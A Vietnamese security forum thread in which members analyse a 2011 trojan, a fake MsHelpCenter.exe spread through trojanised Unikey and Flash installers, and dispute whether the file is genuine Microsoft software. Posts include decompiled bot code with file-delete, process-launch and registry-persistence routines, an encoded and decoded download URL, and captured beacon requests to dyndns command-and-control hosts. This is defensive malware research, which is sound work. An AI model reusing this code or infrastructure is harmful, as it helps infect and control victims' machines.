banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 20:53:50 (+0700) | #121 | 244146
Rolex0210
Member

[Minus]    0    [Plus]
Joined: 17/04/2010 07:54:57
Messages: 9
Offline
[Profile] [PM]
Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời smilie Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^

Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ???
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:00:46 (+0700) | #122 | 244147
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Quá tốt, viết thì cứ viết, đừng ngại gì cả. Viết để phổ biến cho mọi người biết về dịch bệnh âm ỉ stl này và chữa trị !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:38:06 (+0700) | #123 | 244149
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

Rolex0210 wrote:
Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời smilie Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^

Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ??? 


bolzano_1989 nghĩ anh/chị nên gửi anh TQN xem qua trước khi đưa bài viết lên báo để tránh các sai sót về kĩ thuật smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:48:54 (+0700) | #124 | 244150
Rolex0210
Member

[Minus]    0    [Plus]
Joined: 17/04/2010 07:54:57
Messages: 9
Offline
[Profile] [PM]
Dạ đúng như vậy. E chỉ nắm được là chúng ta đang tìm cái "gốc" để từ đó mà nhận dạng, tránh để bị ảnh hưởng xấu từ thứ độc hại mà bọn STL gây ra ( em bị nhiễm a TQN rùi =.=' ) còn mấy cái tool và thuật ngữ chuyên ngành em vẫn đang tìm cách giải thích, so sánh sao cho người ngoài ngành cntt vẫn hiểu được. Cái chính là e muốn nêu lên tinh thần đoàn kết và sự nhiệt tình với công việc của mọi người trong HVA smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 22:21:24 (+0700) | #125 | 244152
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Viết báo thì phải biết là viết cho ai đọc. Vậy là đủ rồi. Bài đăng thông tin thông báo, thông tin gợi ý, thông tin kỹ thuật chuyên môn, thông tin phòng chống, thông tin định danh chủ thể phá hoại, hoặc thông tin kịch tính kiểu như báo lá cải.... Tuỳ chọn, người viết đừng quá sa đà vào kiểu gán gép , chỉ đích danh hoặc bài báo "huyền bí" về nội dung.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 00:06:13 (+0700) | #126 | 244154
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]

G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default.

cái link để download là http://poxxf.com/flash.swf?cpn=<User name>
 


Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME]
Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được.

Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ???

Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top).

Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"<smilie:

maowoli.dyndns-free.com (Destination IP: 78.110.24.85)
biouzhen.dyndns-server.com (Destination IP: 78.110.24.85)
tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)
 


Vẫn chưa biết được service/process nào liên quan đến những URL này smilie. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá.

Ngóng chờ tiếp smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 00:15:08 (+0700) | #127 | 244155
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
1 vài packet vừa bắt được, nhưng em kiểm tra smartsniff hình như ko biết được processId

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: tongfeirou.dyndns-web.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close
 
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 04:34:32 (+0700) | #128 | 244156
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

TQN wrote:
Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%.

Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ?
Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả !

Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB.

Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.

 


Hì hì, em cứ viết 1 bức thư bằng tiếng Việt, trình bày cụ thể từng chi tiết theo góc độ kỹ thuật em nhận định rồi gởi cho anh. Anh chuyển nó sang tiếng Anh và gởi ngược lại cho em ngay trong vòng vài phút. Đừng dùng google translate em vì nó buồn cười lắm smilie.

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 05:56:33 (+0700) | #129 | 244158
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]
2 trang YeuHoaBinh.com và NetHoaBinh.com có rank là 682 và 688 (theo thứ tự các website ViệtNam) trên Alexa.

Và...việc tìm kiếm tới UniKey luôn đứng đầu 2 site này...chứng tỏ bà còn Việt bị nhiễm malware hơi nhiều.

http://www.alexa.com/siteinfo/nethoabinh.com

http://www.alexa.com/siteinfo/yeuhoabinh.com

Một điều đáng ngạc nhiên là như lequi nói: Khi search google về Flash Player download thì NETHOABINH.COM đứng trong top đầu mới kinh. Tuy nhiên link tới mediafire.com đã bị delete, ai có file Flash Player này thì tốt quá.

Mà cái bạn "LAM VOI" trên NETHOABINH có vẻ hâm mộ TQ quá, avatar là anh LÝ THÀNH LONG, lại còn học tiếng Trung Quốc....

@lequi: check traffic qua nettop cho các domain mà bạn đưa ra thì hầu hết là ZERO, và các domain này vừa mới được thiết lập (vào khoảng thời gian đầu tháng 7).
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 08:16:06 (+0700) | #130 | 244159
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 08:53:22 (+0700) | #131 | 244165
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

PXMMRF wrote:

bolzano_1989 wrote:

PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe
Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà
original name: MsHelpCenter.exe
internal name: (cũng là) MsHelpCenter.exe
file version.: 6.1.7600.16385
MD5 : 915e9432ca9414a771071ee0cc115930
SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
File size : 9332736 bytes
OK?
 


Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned smilie :
http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090 


Nó đây nè bolzano_1989 ạ
Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS.

Bản phân tích của MsHelpCenter.exe đây nè:






 


Gửi chú PXMMRF,
Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck:
publisher....: Microsoft Corporation
copyright....: (c) Microsoft Corporation. All rights reserved.
product......: Microsoft_ Windows_ Operating System
description..: Microsoft Help Center
original name: MsHelpCenter.exe
internal name: MsHelpCenter.exe
file version.: 6.1.7600.16385 


Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau:
Verified: Unsigned
File date: 9:34 AM 12/31/2010
Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này smilie .
Đồng thời file này không được digitally signed bởi Microsoft Windows.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 09:43:19 (+0700) | #132 | 244167
exception
Member

[Minus]    0    [Plus]
Joined: 10/07/2011 23:48:25
Messages: 15
Offline
[Profile] [PM]
Các bạn submit các mẫu cho tất cả các AV luôn nhé:

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1018
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 10:35:51 (+0700) | #133 | 244169
ptv_vbhp
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:16:44
Messages: 11
Offline
[Profile] [PM]
Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix

[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 10:58:18 (+0700) | #134 | 244174
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

bolzano_1989 wrote:
Gửi chú PXMMRF,
Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck:
publisher....: Microsoft Corporation
copyright....: (c) Microsoft Corporation. All rights reserved.
product......: Microsoft_ Windows_ Operating System
description..: Microsoft Help Center
original name: MsHelpCenter.exe
internal name: MsHelpCenter.exe
file version.: 6.1.7600.16385 


Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau:
Verified: Unsigned
File date: 9:34 AM 12/31/2010
Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này smilie .
Đồng thời file này không được digitally signed bởi Microsoft Windows. 


Trước hết cám ơn bolzano_1989 vì đã quote lai các file hình ảnh trên bài tôi viết. Tôi thường bổ sung hình ảnh để bài viết khỏi nhàm chán, các bạn đỡ mất công phải click nhiều lần và xem cho sướng mắt. Cũng còn có đôi lý do khác, hay hay đấy.
Sau nữa cảm ơn về những đóng góp của bạn, thể hiện việc bạn luôn không ngai khó, tìm hiểu đến cùng những vấn đề mình chưa biết hay chưa đồng ý. Đó là đức tinh quý và cần của người làm bảo mật. Trước đây Triệu trần Đức cũng có đức tính này.

Quay trở lại vấn đề file MSHelpCenter.exe, tôi có thêm ý kiến sau:

1- Đây là file nguyên thuỷ (originally made) của MS. Hầu hết các OS của MS đều sử dụng file này.

2- Nhưng cũng vì vậy có rất nhiều phiên bản (version) của file nói trên. MS lọc -cắt bớt- bổ sung file nguyên thuỷ cho phù hợp với từng OS. Vì vậy nói về file MSHelpCenter.exe là phải nói chính xác là nó ở OS nào, đã được update chưa?
Đã có một công ty chuyên làm về File Database thống kê hiên nay có tới gần 60 loại file MSHelpCenter.exe với nôi dung có các điểm khác nhau, dung lượng khác nhau (tất nhiên MD5 cũng khác nhau)
Tham khảo tại:
http://systemexplorer.net/db/mshelpcenter.exe.html

3- Có lẽ chính vì vậy mà MS khó hay không thể áp dụng việc Digitally signed cho tất cả các file MSHelpCenter.exe trong thưc tế. Tất nhiên các file khác chỉ có 1 version hay một vài version thì có thể.

4- Như tôi đã nói ở post trên, các hacker hay đặt tên các service, process, file của virus trùng đúng với tên service, process, file nguyên thuỷ của các HDH, nhằm làm cho user không nghi ngờ hay nếu nghi ngờ thì lại bối rối ....
Do vậy không loại trừ khả năng có một hacker nào đó trên TG đã đặt tên file của virus là MSHelpCenter.exe, hay nhúng virus vào trong file này (Thưc tế điều này đã có- Xin xem hình cho đỡ mỏi tay click)




5- Trong trường hợp nghi ngờ một file loại này có virus mà không thể kiểm bằng digitally signed thì đành phải kiểm bằng cách khác, như tôi đã nói: kiểm vị trí đúng (right location) của file trong directory. Hacker không có thể đặt các file trùng tên trong một folder, nhưng trong 2 folder khác nhau thì lại được. Tuy nhiên ở các OS khác nhau thì vị trí đúng của file có thể khác nhau. Đó là điều khó.

Và cách đáng tin nhất nhất là check nó trên mạng để kiểm tra có nhiễm virus hay không, như tôi đã làm với file MSHelpCenter.exe và post hình lên.

Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác ngoài file nói trên
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:01:41 (+0700) | #135 | 244175
rang0
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
[Profile] [PM]

PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác  


Gửi anh PXMMRF,

Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ.

Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh.

Rang0 !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:07:09 (+0700) | #136 | 244176
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

rang0 wrote:

PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác  


Gửi anh PXMMRF,

Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ.

Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh.

Rang0 ! 

Tôi đọc kỹ, rất kỹ là khác. Nhưng chính TQN cũng đang thấy cần phải kiểm tra lai mà. Xem những post cuối cùng của TQN (xem kỹ nhé- Thanks)
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:13:41 (+0700) | #137 | 244177
rang0
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
[Profile] [PM]
int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
int v4; // eax@0
unsigned int v6; // [sp-10h] [bp-38h]@1
HANDLE hObject; // [sp+0h] [bp-28h]@12
DWORD ThreadId; // [sp+4h] [bp-24h]@12
WCHAR v9; // [sp+8h] [bp-20h]@4
LPCWSTR lpFileName; // [sp+Ch] [bp-1Ch]@4
unsigned int *v11; // [sp+10h] [bp-18h]@1
int v12; // [sp+18h] [bp-10h]@1
int (__cdecl *v13)(int, PVOID, int); // [sp+1Ch] [bp-Ch]@1
unsigned int v14; // [sp+20h] [bp-8h]@1
int v15; // [sp+24h] [bp-4h]@1
int v16; // [sp+28h] [bp+0h]@1

v13 = _except_handler4;
v12 = v4;
v14 = __security_cookie ^ (unsigned int)&unk_4126C8;
v6 = (unsigned int)&v16 ^ __security_cookie;
v11 = &v6;
v15 = 0;
SetUnhandledExceptionFilter(TopLevelExceptionFilter);
if ( lstrlenW(lpCmdLine) <= 3 )
{
if ( !lstrlenW(lpCmdLine) )
{
ThreadId = 0;
hObject = CreateThread(0, 0x80000u, StartAddress, 0, 0, &ThreadId);
CloseHandle(hObject);
create_bot();
}
}
else
{
if ( *lpCmdLine == '-' && lpCmdLine[2] == ' ' )
{
v9 = lpCmdLine[1];
lpFileName = lpCmdLine + 3;
switch ( v9 )
{
case 'd':
delete_file(lpFileName);
break;
case 'r':
create_process(lpFileName, &CommandLine, 0);
break;
case 'b':
create_new_process(lpFileName, 0);
break;
}
}
}
return 0;




Code:
lstrcpyW(&SubKey, L"softw");
  lstrcatW(&SubKey, L"are\\micr");
  lstrcpyW((LPWSTR)&v6, L"kjewoopipo");
  lstrcatW(&SubKey, L"osoft\\w");
  lstrcpyW((LPWSTR)&v6, L"rewfe");
  lstrcatW(&SubKey, L"indo");
  lstrcatW(&SubKey, L"ws\\");
  lstrcatW(&SubKey, L"Microsoft Help Center");
  RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &hKey, &dwDisposition);
  cbData = 2000;
  v12 = RegQueryValueExW(hKey, ValueName, 0, &Type, (LPBYTE)Data, &cbData);
  if ( v12 )
  {
    v1 = lstrlenW((LPCWSTR)Data);
    RegSetValueExW(hKey, ValueName, 0, 1u, (const BYTE *)Data, 2 * v1);
  }
  RegCloseKey(hKey);


Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:14:16 (+0700) | #138 | 244178
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

ptv_vbhp wrote:
Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix

 


BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à?
.Rất hoan nghênh.
Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:15:34 (+0700) | #139 | 244179
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]
là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA.

trong MSHelpCenter.exe

File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD

địa chỉ của hàm decode :401B30h

Hàm download : 4015B0h

Ngoài ra còn hàm này để ghi key trong registry:4017F0h
Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:23:23 (+0700) | #140 | 244180
ptv_vbhp
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:16:44
Messages: 11
Offline
[Profile] [PM]

PXMMRF wrote:

BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? [/color].Rất hoan nghênh.
Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011? 

Con fake adobe thì em thấy mới có thứ 7 tuần trước, còn con idx kia thì em ko biết rõ vì máy em ko có file này để check lúc trước smilie .
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:38:14 (+0700) | #141 | 244182
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

rang0 wrote:


Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?
 


Tôi ghi nhân ý kiến của bạn và tôi sẽ nghiên cứu kỹ để làm rõ 1 vài vấn đề đến nay
tôi vẫn còn thắc mắc. Thanks (Tôi cũng sẽ kiểm tra lai code của file này lần nữa, dù kinh nghiêm khả năng về mặt này thưc ra không bằng TQN)

Đó là:

1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?)

2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus?

3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả

Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:44:58 (+0700) | #142 | 244183
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:55:00 (+0700) | #143 | 244185
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

acoustics89 wrote:
là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA.

trong MSHelpCenter.exe

File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD

địa chỉ của hàm decode :401B30h

Hàm download : 4015B0h

Ngoài ra còn hàm này để ghi key trong registry:4017F0h
Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ 


Cám ơn các thông tin của em và anh rất tin vào những dòng code em post lên, nó đã rõ ràng như em nhận định.
Nhưng chỉ hỏi thêm điều này, nêu thấy không tiện thì không trả lời cũng được: Em có chắc chắn máy em dùng dể desassembling các file ấy có "clean" 100% hay không?

Note. Anh đã cẩn thận check file MSHelpCenter.exe không chỉ trên virustotal mà còn trên ít nhất 8 filechecking website khác nữa, của các hảng antivirus nổi tiếng nhất. Hì hì
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 12:32:21 (+0700) | #144 | 244187
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]
Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi

